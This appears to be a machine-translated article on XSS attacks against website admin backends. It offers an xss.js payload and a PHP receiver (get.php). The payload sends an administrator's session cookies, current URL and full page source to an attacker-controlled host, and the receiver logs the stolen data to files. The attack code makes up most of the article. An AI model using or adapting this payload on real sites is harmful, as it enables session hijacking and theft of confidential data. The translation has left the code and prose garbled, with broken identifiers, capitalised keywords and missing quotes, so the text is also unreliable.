Client-Attack of XSS

Http://www.vul.kr /? P = 158 Source: evil baboons Author: TTFCT

1. Why can't I find the backend in penetration testing?
2. When no one else logs in, the confidential information in the background is stolen for no reason?
3. Is there any trace of non-managed IP login when the background password is extremely complex and cannot be cracked?

The XSS Client-Attack described in this article mainly involves the above three issues. The following is a detailed description:

1. When the management background is XSS, XSS can send the current Administrator page to the acceptor and implement it using location. href.
2. When the management backend is XSS, although the IE gettoken is limited, XSS can submit the Administrator's front-page source code segment to the receiving end multiple times and implement it with ajax?document.doc umentElement. outerHTML (here I will focus on it)
3. When the management background is XSS, XSS sends the SESSION cookies for management login to the receiving end. When the background verification is lax, attackers directly use cookies to log on to the background and use document. COOKIE for implementation.

Here, I would like to give a lecture on 2. I can directly use document.doc umentElement. outerHTML to get the source code of the current page. Why AJAX? The original cause of the question is that using document.doc umentElement. outerHTML directly causes incomplete source code retrieval.

Example 1:

Admin-1.html

This is source code
<Script>
Alert(document.doc umentElement. outerHTML)
</Script>
How about this?

We found that there is no "how about this?" in the alert window ?", This means that no source file can be obtained after the XSS code is inserted. Therefore, AJAX is required to obtain all files.
In addition, the page opened by the other party is saved locally, for example, C: usersadministratordesktopdata.htm. you must use document.doc umentElement. outerHTML to capture the page.

See XSS source code
------------------------------ Xss. js ----------------------------------
Function sd (doc ){
Send = document. createElement (script );
Send. src = server + get. php? + Doc;
Send. type = javascript;
Head. appendChild (send );
}
Function ajax (u ){
Var xmlHttp;
Try {
XmlHttp = new XMLHttpRequest;
} Catch (e ){
Try {
XmlHttp = new ActiveXObject ("Msxml2.XMLHTTP ");
} Catch (e ){
Try {
XmlHttp = new ActiveXObject ("Microsoft. XMLHTTP ");
} Catch (e ){
}
}
}
XmlHttp. open ("GET", u, false );
XmlHttp. send (null );
Return escape (xmlHttp. responseText );
}

Var doc =;
Var server = http://www.vul.kr // IT information, tools, techniques, exploit
Var head = document. getElementsByTagName (head). item (0 );

Url = encodeURIComponent (location. href );
Ck = encodeURIComponent (document. cookie );
Sd ("s = 1 & u =" + url + "& c =" + ck );

If (location. href. indexOf ("file:") =-1) // you can check whether the file is local.
Doc = ajax (location. href );
Else
Doc=escape(document.doc umentElement. outerHTML );

Doclen = doc. length;
Buflen = 2040; // you can specify the submit part size.
For (I = 0; I <doclen; I = I + buflen ){
Dstr = doc. substr (I, buflen); // start submission
Sd ("s = 2 & d =" + dstr );
}
Sd ("s = 3 ");
----------------------------- End xxs. js ----------------------------------

Acceptor code:
-------------------------------- Get. php ----------------------------------
<?
$ Url = 0; $ data = 0; $ cookie = 0; $ addr = 0;
$ Url = $ _ GET [u];

If (strlen ($ _ GET [c])> 2) $ cookie =$ _ GET [c];
If (strlen ($ _ GET [d])> 2) $ data = $ _ GET [d];
If (strlen ($ _ SERVER [REMOTE_ADDR])> 2) $ addr = $ _ SERVER [REMOTE_ADDR];

$ Str = "<center> <textarea name = textarea cols = 150 rows = 30> ";
$ Str. = "URL :". $ url. "Cookie :". $ cookie. "Address :". $ addr. "Time :". date ("Y-m-d h: I: s", time ()). "";
If ($ _ GET [s] = 1) w ($ str );

If ($ _ GET [s] = 2) w (htmlentities ($ data ));

If ($ _ GET [s] = 3) w ("</textarea> </center> ");

Function w ($ d ){
$ A = $ _ SERVER [REMOTE_ADDR];
@ Fwrite (@ fopen ("dc/". $ a. ". htm", "a +"), stripcslashes ($ d ));}
?>

-------------------- End get. php --------------------------------------------

Welcome to visit: www. vul. kr